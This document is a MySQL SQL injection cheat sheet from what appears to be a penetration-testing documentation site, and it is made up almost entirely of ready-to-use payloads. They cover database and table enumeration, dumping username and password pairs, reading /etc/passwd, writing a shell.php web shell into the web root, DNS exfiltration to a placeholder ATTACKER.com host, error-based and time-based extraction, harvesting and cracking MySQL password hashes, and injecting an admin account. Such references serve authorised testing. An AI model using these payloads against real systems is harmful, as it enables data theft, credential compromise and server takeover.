Skip to main content

Documentation Index

Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt

Use this file to discover all available pages before exploring further.

Identification

SELECT @@version
SELECT version()
-- Comment: # or -- - or /* */
-- String concat: CONCAT('a','b') or 'a' 'b'

Information Gathering

SELECT database()
SELECT user()
SELECT @@hostname
SELECT @@datadir
SELECT @@basedir

Enumerate Databases

SELECT schema_name FROM information_schema.schemata
SELECT group_concat(schema_name) FROM information_schema.schemata

Enumerate Tables

SELECT table_name FROM information_schema.tables WHERE table_schema=database()
SELECT group_concat(table_name) FROM information_schema.tables WHERE table_schema='dbname'

Without information_schema (MySQL 5.6+)

SELECT table_name FROM mysql.innodb_table_stats WHERE database_name=database()

Enumerate Columns

SELECT column_name FROM information_schema.columns WHERE table_name='users'
SELECT group_concat(column_name) FROM information_schema.columns WHERE table_name='users' AND table_schema=database()

Dump Data

SELECT group_concat(username,0x3a,password) FROM users
SELECT group_concat(username,':',password SEPARATOR '\n') FROM users

String Functions

FunctionDescription
CONCAT(a,b)Concatenate
CONCAT_WS(':',a,b)Concat with separator
GROUP_CONCAT(a)Aggregate concat
SUBSTRING(str,pos,len)Substring
MID(str,pos,len)Same as SUBSTRING
LEFT(str,n)Left N chars
RIGHT(str,n)Right N chars
LENGTH(str)String length
ASCII(char)ASCII value
ORD(char)Same as ASCII
CHAR(n)Char from ASCII
HEX(str)Hex encode
UNHEX(hex)Hex decode
REVERSE(str)Reverse string

Conditional

IF(condition, true_val, false_val)
CASE WHEN condition THEN true_val ELSE false_val END
IFNULL(expr, alt)

Time Delay

SLEEP(5)
BENCHMARK(10000000, SHA1('test'))

File Read

SELECT LOAD_FILE('/etc/passwd')
SELECT LOAD_FILE(0x2f6574632f706173737764)    -- Hex path

File Write

SELECT 'data' INTO OUTFILE '/var/www/html/shell.php'
SELECT 'data' INTO DUMPFILE '/var/www/html/shell.php'
Check restriction: 
SELECT @@secure_file_priv

DNS Exfiltration (Windows)

SELECT LOAD_FILE(CONCAT('\\\\',database(),'.ATTACKER.com\\x'))

Error-Based

extractvalue(1,concat(0x7e,(QUERY)))
updatexml(1,concat(0x7e,(QUERY)),1)
(SELECT 1 FROM (SELECT count(*),concat((QUERY),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)

Password Hashes

SELECT user,authentication_string FROM mysql.user        -- MySQL 5.7+
SELECT user,password FROM mysql.user                     -- MySQL 5.6-
Crack: hashcat -m 300 (MySQL4) or -m 7401 (MySQL5).

Stacked Queries

Only with mysqli_multi_query() or PDO: 
'; INSERT INTO users VALUES('hack','pass','admin');-- -

Useful Operators

-- LIKE wildcard
SELECT * FROM users WHERE username LIKE 'adm%'

-- REGEXP
SELECT * FROM users WHERE username REGEXP '^admin'

-- IN
SELECT * FROM users WHERE id IN (1,2,3)

-- BETWEEN
SELECT * FROM users WHERE id BETWEEN 1 AND 10

Sources